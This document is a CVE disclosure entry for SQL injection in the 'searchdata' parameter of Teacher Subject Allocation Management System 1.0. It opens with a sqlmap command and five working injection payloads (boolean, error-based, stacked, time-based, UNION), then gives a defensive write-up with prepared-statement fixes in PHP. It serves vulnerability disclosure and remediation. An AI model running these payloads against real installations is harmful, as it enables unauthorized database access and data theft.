Teacher Subject Allocation Management System 1.0 - 'searchdata' SQLi

Exploit Author: Ersin Erenler Analysis Author: www.bubbleslearn.ir Category: WebApps Language: SQL Published Date: 2024-03-20

# Exploit Title: Teacher Subject Allocation Management System 1.0 - 'searchdata' SQLi
# Date: 2023-11-15
# Exploit Author: Ersin Erenler
# Vendor Homepage: https://phpgurukul.com/teacher-subject-allocation-system-using-php-and-mysql
# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=17645
# Version: 1.0
# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0
# CVE : CVE-2023-46024

-------------------------------------------------------------------------------

# Description:

Teacher Subject Allocation Management System V1.0 is susceptible to a significant security vulnerability that arises from insufficient protection on the 'searchdata' parameter in the index.php file. This flaw can potentially be exploited to inject malicious SQL queries, leading to unauthorized access and extraction of sensitive information from the database.

Vulnerable File: /index.php

Parameter Name: searchdata

# Proof of Concept:
----------------------

Execute sqlmap using either the 'searchdata' parameter to retrieve the current database:

sqlmap -u "http://localhost/Tsas" --method POST --data "searchdata=test&search=" -p searchdata --risk 3 --level 3 --dbms mysql --batch --current-db

SQLMap Response:
----------------------
---
Parameter: searchdata (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: searchdata=test%' AND 3912=3912 AND 'qxHV%'='qxHV&search=

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: searchdata=test%' AND (SELECT 1043 FROM(SELECT COUNT(*),CONCAT(0x7170706a71,(SELECT (ELT(1043=1043,1))),0x717a787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'kewe%'='kewe&search=

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: searchdata=test%';SELECT SLEEP(5)#&search=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchdata=test%' AND (SELECT 8862 FROM (SELECT(SLEEP(5)))GqzT) AND 'wylU%'='wylU&search=

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: searchdata=test%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170706a71,0x784e7a47626a794a74456975444c5a4c64734556414658476e75684c4a716f6173724b6b6a685163,0x717a787171)-- -&search=
---

Teacher Subject Allocation Management System 1.0 — 'searchdata' SQL Injection (CVE-2023-46024)

This article explains the SQL injection reported in Teacher Subject Allocation Management System v1.0 (CVE-2023-46024), why it is dangerous, how to detect it, and recommended remediations and hardening best practices. It focuses on secure, practical guidance for developers and administrators to eliminate this vulnerability and reduce the risk of similar flaws.

Summary / CVE Information

Item	Details
Product	Teacher Subject Allocation Management System
Version	1.0
Vulnerability	SQL Injection via searchdata parameter in index.php
CVE	CVE-2023-46024
Risk	High — data disclosure, authentication bypass, remote data manipulation

Why this is dangerous

SQL injection (SQLi) allows an attacker to manipulate the SQL queries your application sends to the database. With a vulnerable search input, an attacker can read, modify, or delete data, escalate privileges, and sometimes execute database-level commands. In multi-tenant or production environments that hold sensitive information (personal data, credentials), this can lead to severe breaches.

Root cause (conceptual)

The application directly interpolates user-supplied input into SQL statements without safe handling.
Search parameters are often concatenated into WHERE or LIKE expressions; without parameterization these inputs influence the query structure.
Lack of prepared statements, missing input validation, and overly permissive DB user privileges amplify impact.

Indicators and detection

Application error messages that reveal SQL text or database errors in response to crafted inputs.
Unusual query patterns in database logs — unexpected joins, functions, or long concatenated values.
Spike in requests to search-related endpoints or repeated requests with unusual characters (percent, quotes, comment tokens).
Alerts from web application scanners or WAF showing SQLi signatures.

Immediate mitigations (short-term)

Apply an application firewall rule blocking suspicious query characters/patterns for the search endpoint.
Disable verbose error messages to avoid leaking SQL or stack traces to clients.
Restrict the database account used by the web app to only the minimum required permissions (SELECT/INSERT/UPDATE as necessary).
Ensure regular backups are in place and isolate the affected instance for forensic review if compromise suspected.

Secure coding remediation (recommended)

The most effective fix is to stop building SQL queries by concatenating raw inputs. Use parameterized queries (prepared statements), set the correct character set, and avoid emulated prepares. Below are secure examples for PHP using PDO and mysqli. Use these patterns to replace vulnerable code in index.php or search handling components.

Example: Safe PDO implementation (recommended)

<?php
// Secure PDO connection
$dsn = "mysql:host=DB_HOST;dbname=DB_NAME;charset=utf8mb4";
$options = [
    PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    PDO::ATTR_EMULATE_PREPARES   => false, // important: use native prepares
];
$pdo = new PDO($dsn, 'DB_USER', 'DB_PASS', $options);

// Fetch and normalize input
$search = $_POST['searchdata'] ?? '';
// Whitelist length and basic normalization
$search = trim(mb_substr($search, 0, 200));

// Parameterized query with LIKE
$stmt = $pdo->prepare('SELECT id, teacher_name, subject FROM allocations WHERE subject LIKE :search LIMIT 100');
$stmt->execute([':search' => "%{$search}%"]);
$results = $stmt->fetchAll();

// Output safely (escape for HTML where needed)
foreach ($results as $row) {
    echo htmlspecialchars($row['teacher_name'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . ' - ';
    echo htmlspecialchars($row['subject'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '<br>';
}
?>

Explanation: This snippet uses PDO with native prepared statements (ATTR_EMULATE_PREPARES disabled). The user input is bounded as a parameter; the database treats it as data, not SQL. The LIKE pattern is built in PHP, not by concatenating into raw SQL. Output is escaped to mitigate XSS.

Example: Safe mysqli implementation

<?php
$mysqli = new mysqli('DB_HOST', 'DB_USER', 'DB_PASS', 'DB_NAME');
$mysqli->set_charset('utf8mb4');

$search = $_POST['searchdata'] ?? '';
$search = trim(mb_substr($search, 0, 200));
$param = '%' . $search . '%';

$stmt = $mysqli->prepare('SELECT id, teacher_name, subject FROM allocations WHERE subject LIKE ? LIMIT 100');
$stmt->bind_param('s', $param);
$stmt->execute();
$result = $stmt->get_result();
while ($row = $result->fetch_assoc()) {
    echo htmlspecialchars($row['teacher_name'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . ' - ';
    echo htmlspecialchars($row['subject'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '<br>';
}
$stmt->close();
$mysqli->close();
?>

Explanation: Similar to PDO, this code uses mysqli prepared statements and binding for the LIKE parameter, preventing injection and ensuring proper character encoding.

Other code- and deployment-level hardening

Disable or limit multi-statement execution if your DB client supports it — avoid executing stacked queries from a single user input.
Use least-privilege database users: avoid granting DROP/ALTER or ADMIN rights to the app account.
Set the connection character set to utf8mb4 to prevent encoding-based bypasses.
Centralize query logic and use query builders/ORMs that provide parameterization by default.
Sanitize and validate inputs with a whitelist approach where practical (e.g., allowed terms, max length).
Log anomalous search inputs and rate-limit search endpoints to prevent automated exploitation attempts.

Testing and verification (safe, non-exploitative)

Run code reviews and static analysis to ensure no raw concatenation of untrusted inputs into SQL strings.
Use automated security scanners from trusted vendors in a controlled test environment. Ensure tools are used responsibly and only on systems you own or have permission to test.
Perform authenticated penetration tests by qualified professionals and remediate any findings.
After fixes, verify logs show only parameterized queries and that application responses no longer leak SQL errors.

Operational response and lifecycle

Patch the application by replacing vulnerable code paths and ship updates to all affected deployments.
Rotate database credentials used by the application after a confirmed compromise or high-risk exposure.
Notify stakeholders and follow applicable breach reporting laws if sensitive data was exposed.
Keep the application, web server, and database engine updated with vendor security patches.

Final recommendations (best practices)

Adopt prepared statements everywhere user input is used in SQL.
Apply defense-in-depth: input validation, parameterized queries, WAF, least privilege, logging and monitoring.
Make secure coding and dependency updates part of your development lifecycle and CI/CD pipelines.
Document and track security fixes — ensure CVEs and patches are communicated to all deployers of the software.